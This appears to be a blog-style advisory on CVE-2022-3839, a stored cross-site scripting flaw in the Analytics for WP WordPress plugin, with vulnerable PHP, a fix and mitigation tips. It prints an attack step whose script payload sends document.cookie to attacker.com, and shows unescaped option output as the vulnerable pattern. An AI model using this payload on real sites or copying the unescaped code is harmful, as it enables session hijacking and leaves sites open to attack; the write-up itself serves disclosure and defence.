CVE-2022-3839 - Uncovering Stored XSS in the Analytics for WP Plugin (WordPress) — Full Exploit Details

WordPress, the backbone of millions of websites, is only as secure as its plugins. Today, we spotlight a real world vulnerability: CVE-2022-3839, found in the Analytics for WP plugin (versions through 1.5.1). Though patched, understanding the issue gives webmasters and WordPress admins essential insight on plugin security—and its real risks.

What is CVE-2022-3839?

This vulnerability allows WordPress admins or other high-privilege users to perform a Stored Cross-Site Scripting (XSS) attack by abusing how some plugin settings are processed.

The issue? Lack of sanitization and escaping. Certain Analytics for WP settings accept user input without proper filtering. When a user (including an admin with restricted capabilities, e.g., in Multisite setups) saves malicious JavaScript code in these settings, it will be stored and rendered back unsanitized—leading to XSS.

> Danger: Even sites where unfiltered_html is denied (a common security step in Multisite) are exposed, making this a bigger problem than just careless admins.


Official advisory:  
- WordFence Vulnerability Report
- WPScan Report

Attacker gets access to a high-privilege account

In practice: This is usually another trusted admin. In Multisite, many admins lack unfiltered_html ability, so they're *supposed* to be safe from XSS.

Below is a simplified version of vulnerable code (as found in affected versions)

// Vulnerable: outputting $_POST['analytics_custom_code'] directly
if (isset($_POST['analytics_custom_code'])) {
    update_option('analytics_custom_code', $_POST['analytics_custom_code']);
}

// Elsewhere, the custom code is output in admin (or even front-end)
echo get_option('analytics_custom_code'); // NO sanitize/escape!

Say an attacker enters this in the "Custom Code" field

<script>alert('XSS via Analytics for WP!')</script>

This will be saved to the database. Whenever the dashboard (or place where this field is output) gets loaded, the alert fires. Replace with more malicious JavaScript, and you have a real breach.

Affects Multisite: Even where admins can't use raw HTML, this plugin bug makes it possible.

- Privilege Escalation: Can steal cookies, redirect to phishing sites, or hijack sessions—even for Super Admins if they trigger the payload.
- Not Limited to Malicious Admins: If an admin's account is compromised (phished, leaked), attacker can get persistent XSS on all site users.

4. Paste the XSS payload

<script>fetch('https://attacker.com/c?t='+document.cookie)</script>

5. Save settings.

### 6. Super Admin or other users visit Analytics settings page. JS executes; cookies (or other sensitive info) are sent to the attacker.

How to Fix?

Plugin developer's fix:  
Users should update the Analytics for WP plugin to the latest version. The developers have added proper escaping and sanitization:

Example Fix

// Secure: sanitize before saving, escape before output
if (isset($_POST['analytics_custom_code'])) {
    $custom_code = wp_kses_post($_POST['analytics_custom_code']);
    update_option('analytics_custom_code', $custom_code);
}

// Later, when rendering:
echo wp_kses_post(get_option('analytics_custom_code'));

Monitor admin accounts: Especially in multisite setups.

- Security plugins: Enable WAF/XSS protection (Wordfence, Sucuri, etc.).

References

- WordFence Analysis
- WPScan Vulnerability Post
- CVE Details on MITRE
- Plugin's changelog

Final Thoughts

Even trusted admins can make mistakes, or their accounts fall into the wrong hands. CVE-2022-3839 in Analytics for WP is a prime example of why *every* bit of user input—even from “safe” staff—must be sanitized and escaped.

*If you use Analytics for WP, update right away!*

Stay safe and always keep an eye on your plugins’ security advisories!

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 11/30/2022 03:50:00 UTC